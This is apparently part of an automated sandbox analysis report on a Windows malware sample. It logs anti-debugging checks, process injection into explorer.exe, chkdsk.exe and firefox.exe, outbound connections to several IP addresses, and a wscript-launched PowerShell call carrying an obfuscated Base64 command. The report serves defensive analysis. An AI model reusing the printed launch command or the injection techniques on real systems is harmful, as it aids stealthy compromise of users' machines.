      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F053CD4 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F053CD4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F053CD4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F045CD0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBFD20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F094CD2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEAD20 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEAD20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F040CEE mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F057CE8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFECD10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFECD10 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03CCF0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFCAD00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFCAD00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFCAD00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFCAD00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFCAD00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFCAD00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFE0D01 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD3AF6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD3AF6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD3AF6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD3AF6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD3AF6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F001B0F mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F001B0F mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC0AED mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC0AED mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC0AED mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFE0AEB mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFE0AEB mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFE0AEB mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBFAEC mov edi, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC9AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F04DB1B mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F04CB20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F04CB20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F04CB20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F04DB2A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD0ACE mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD0ACE mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEDAC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEDAC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEDAC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEDAC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEDAC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEDAC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF9ABF mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF9ABF mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF9ABF mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F04FB45 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F07BB40 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F07BB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F094B67 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F076B77 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBBA80 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F04DB90 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F041B93 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F088BBE mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F088BBE mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F088BBE mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F088BBE mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF9A48 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF9A48 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEEA40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEEA40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBFA44 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03FBC2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F044BC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F044BC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F044BC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F044BC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFB7A30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFB7A30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFB7A30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC1A24 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC1A24 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F066BDE mov ebx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F066BDE mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEDA20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEDA20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEDA20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEDA20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEDA20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEDA20 mov edx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F094BE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFFAA0E mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFFAA0E mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFB7BF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFB7BF0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFB7BF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFB7BF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD1BE7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD1BE7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF5BE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF5BE0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFE8BD1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFE8BD1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F04DA31 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F07DA30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBEBC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEFBC0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEFBC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEFBC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEFBC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEFBC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFFBBC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFFBBC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFFBBC0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFFBBC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F04DA40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F05AA40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F05AA40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F044A57 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F044A57 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC3BA4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC3BA4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC3BA4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC3BA4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF1B9C mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08BA66 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08BA66 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08BA66 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08BA66 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD1B80 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFB7B7D mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFB7B7D mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF4B79 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F076A80 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFCAB70 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC6B70 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC6B70 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC6B70 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFFBB5B mov esi, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F07DAAF mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F067ABE mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFFCB20 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F094AE8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEEB1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBCB1E mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC8B10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002F00 NtCreateFile,LdrInitializeThunk,

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeNetwork Connect: 68.65.122.211 80
      Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.18 80
      Source: C:\Windows\explorer.exeNetwork Connect: 209.99.40.222 80
      Source: C:\Windows\explorer.exeNetwork Connect: 199.192.29.215 80
      Source: C:\Windows\explorer.exeNetwork Connect: 180.76.247.231 80
      Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.171 80
      Source: C:\Windows\explorer.exeNetwork Connect: 198.23.49.173 80
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: BA0000
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\chkdsk.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF62D2D0000
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Nandinme5 Bobleka Artikuler hotm Formnin4 Vigesimoki6 stom Echinit6 pronativ Pyro Texttv7 Elevatorfr RAMRODSA Qekursuss beanpo Skrk2 polari medeola Lora Raphi6 #defa pied Tandkdsbe Unimmor Badgerb6 exclus Chondrog8 AEROLO FISHERMANI FAGINTEGR Incepto3 Snurl6 Bisexua dosser gavel metafore tran atak Seismi2 Nonfabul Digtek3 REGNSKA Phytome9 Murae Halv8 VOCIFERATE WOODCRAFT hardheart Knib sejt #Immervk8 Sprogfl REDSHI siffleus Super rifters Grouch Proeveti PROTENSI Lydbillede SUBELECTR Rammetchor CISSESAR Bred jordfste Antisens LOXO #Splurgypy7 Septen Dims Tebrevsunc2 Stttep2 likvide Aftvi pantog vejbyg coco ISBRY PASS Pinf munikat unse GULDR Melodiou panimete Raftesoste avancement Enteasubpr MYCE Tidlnnede3 odyssen dryptrren perso #horn Centr4 Henrykkesl8 FORDAMPNIN Intrafol Caldron infr valg SISYRI Genoako skadegrer Underafsni2 Vaccinat drillerier CHAI #Detoxif afmali Hmmetn Alkoholtyp9 linie TAARN mero Spectro8 stjern Positio Autobio utakne Humanhoo3 ompl Bevisfrels3 Brillefode6 EJENDOMS Turistk4 chantant bondesta BILFRAGTER SIDHEPRE #Skident aanderfiau Tallwoo5 vinologist LOYALE Valeri4 lavin Baar9 forventel Nonconv #PERSONNAV idemp start choyainti loxict Hestebre1 Foelebal Mois Lallet Obelisk3 drikk Lanasr #bestraalin STRMPEH VEDL Myelo Dish Accept1 Unpl3 ARBEJDSLSH Anmeldelse SKOVHYTTE prsteskab Publicis8 Umindel4 #sportsma Dkningss4 Deposi1 regningsfu suspe Deba requir Saltstenm1 RDEPANGI #Selvmodsig SUBD kvksfinge Anom thailnde Ondu nonp WINDB
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Nandinme5 Bobleka Artikuler hotm Formnin4 Vigesimoki6 stom Echinit6 pronativ Pyro Texttv7 Elevatorfr RAMRODSA Qekursuss beanpo Skrk2 polari medeola Lora Raphi6 #defa pied Tandkdsbe Unimmor Badgerb6 exclus Chondrog8 AEROLO FISHERMANI FAGINTEGR Incepto3 Snurl6 Bisexua dosser gavel metafore tran atak Seismi2 Nonfabul Digtek3 REGNSKA Phytome9 Murae Halv8 VOCIFERATE WOODCRAFT hardheart Knib sejt #Immervk8 Sprogfl REDSHI siffleus Super rifters Grouch Proeveti PROTENSI Lydbillede SUBELECTR Rammetchor CISSESAR Bred jordfste Antisens LOXO #Splurgypy7 Septen Dims Tebrevsunc2 Stttep2 likvide Aftvi pantog vejbyg coco ISBRY PASS Pinf munikat unse GULDR Melodiou panimete Raftesoste avancement Enteasubpr MYCE Tidlnnede3 odyssen dryptrren perso #horn Centr4 Henrykkesl8 FORDAMPNIN Intrafol Caldron infr valg SISYRI Genoako skadegrer Underafsni2 Vaccinat drillerier CHAI #Detoxif afmali Hmmetn Alkoholtyp9 linie TAARN mero Spectro8 stjern Positio Autobio utakne Humanhoo3 ompl Bevisfrels3 Brillefode6 EJENDOMS Turistk4 chantant bondesta BILFRAGTER SIDHEPRE #Skident aanderfiau Tallwoo5 vinologist LOYALE Valeri4 lavin Baar9 forventel Nonconv #PERSONNAV idemp start choyainti loxict Hestebre1 Foelebal Mois Lallet Obelisk3 drikk Lanasr #bestraalin STRMPEH VEDL Myelo Dish Accept1 Unpl3 ARBEJDSLSH Anmeldelse SKOVHYTTE prsteskab Publicis8 Umindel4 #sportsma Dkningss4 Deposi1 regningsfu suspe Deba requir Saltstenm1 RDEPANGI #Selvmodsig SUBD kvksfinge Anom thailnde Ondu nonp WINDB
      Source: C:\Windows\SysWOW64\chkdsk.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF62D2D0000 value starts with: 4D5A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread APC queued: target process: C:\Windows\explorer.exe
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread register set: target process: 4828
      Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 4828
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBl